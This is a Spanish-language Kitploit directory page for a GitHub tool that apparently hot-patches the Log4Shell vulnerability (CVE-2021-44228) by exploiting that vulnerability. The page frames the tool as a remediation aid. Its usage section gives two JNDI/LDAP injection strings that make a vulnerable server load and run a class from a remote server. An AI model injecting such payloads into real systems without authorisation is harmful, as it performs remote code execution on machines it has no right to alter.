Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2021-44228-qingteng-online-patch — Hot-patch de CVE-2021-44228 explotando la propia vulnerabilidad. | Kitploit
Herramientas/GitHubGitHub/qingtengyun/cve-2021-44228-qingteng-online-patch
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlRespuesta a Incidentes
GitHubqingtengyun/cve-2021-44228-qingteng-online-patch

cve-2021-44228-qingteng-online-patch

Hot-patch de CVE-2021-44228 explotando la propia vulnerabilidad.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
254hace 4 añosRevisado por Kitploit

cve-2021-44228-qingteng-online-patch

¿Qué es esto?

Parche en caliente CVE-2021-44228 explotando la propia vulnerabilidad.

Cómo usar

Inyecta el siguiente código en cualquier lugar probablemente vulnerable a CVE-2021-44228,

root@kitploit:~
${jndi:ldap://your-own-server/patch}

Para prevenir el ataque MITM durante el proceso de parcheo, se recomienda el siguiente payload, pero con menor compatibilidad para versiones antiguas de Java,

root@kitploit:~
${jndi:ldap://your-own-server/any_string_except_patch}

Ejecuta tu propio servidor

  1. Descarga las últimas versiones

  2. Especifica las variables de entorno del sistema LOG4J_HOTFIX_HTTP_PATH y LOG4J_HOTFIX_HTTPS_PATH si deseas alojar Hotfix.class en tu propio servidor

Compilar

Ten en cuenta que Hotfix.java debe compilarse con JDK6 para máxima compatibilidad.

Descargar herramienta